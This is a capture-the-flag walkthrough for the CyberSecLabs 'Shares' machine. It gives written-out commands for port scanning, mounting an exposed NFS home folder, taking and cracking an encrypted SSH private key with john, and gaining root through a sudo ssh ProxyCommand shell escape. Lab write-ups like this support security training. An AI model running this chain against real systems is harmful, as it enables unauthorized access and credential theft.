Shares

nmap

mkdir nmap
sudo rustscan -a 172.31.1.7 --ulimit 5000 -- -T4 -A -oA nmap/all-ports-service-scan

Enumeration

A file system is open on port 2049, and ssh is weirdly open on port 27853

Looks like we can mount the home folder of user amir

We can mount it by executing the following

mkdir /tmp/amir
sudo mount -t nfs 172.31.1.7:/home/amir /tmp/amir 

Upon digging in the file system, you will notice there's an ssh key inside .ssh folder.

Copy id_rsa to your working directory, and chmod it.

cp id_rsa ~/infosec/cyberseclabs/shares/amir_id_rsa
chmod +x amir_id_rsa

The ssh key is encrypted, it means we have to crack this with john

ssh2john amir_id_rsa > amir_id_rsa.ssh2john
john amir_id_rsa.ssh2john -w=/opt/wordlist/rockyou.txt

After a few seconds, you will be able to get the password.

Initial foothold

Using the SSH key, the cracked password, and the knowledge of user amir being existed. Now we can log in. Sweet :D

Privilege Escalation

We can execute python3 as user amy

We can leverage that and gain a shell as amy

And with user amy, we can run sudo command with ssh

Now we can gain root, by executing the following

sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x    

Enjoy your root privilege. :D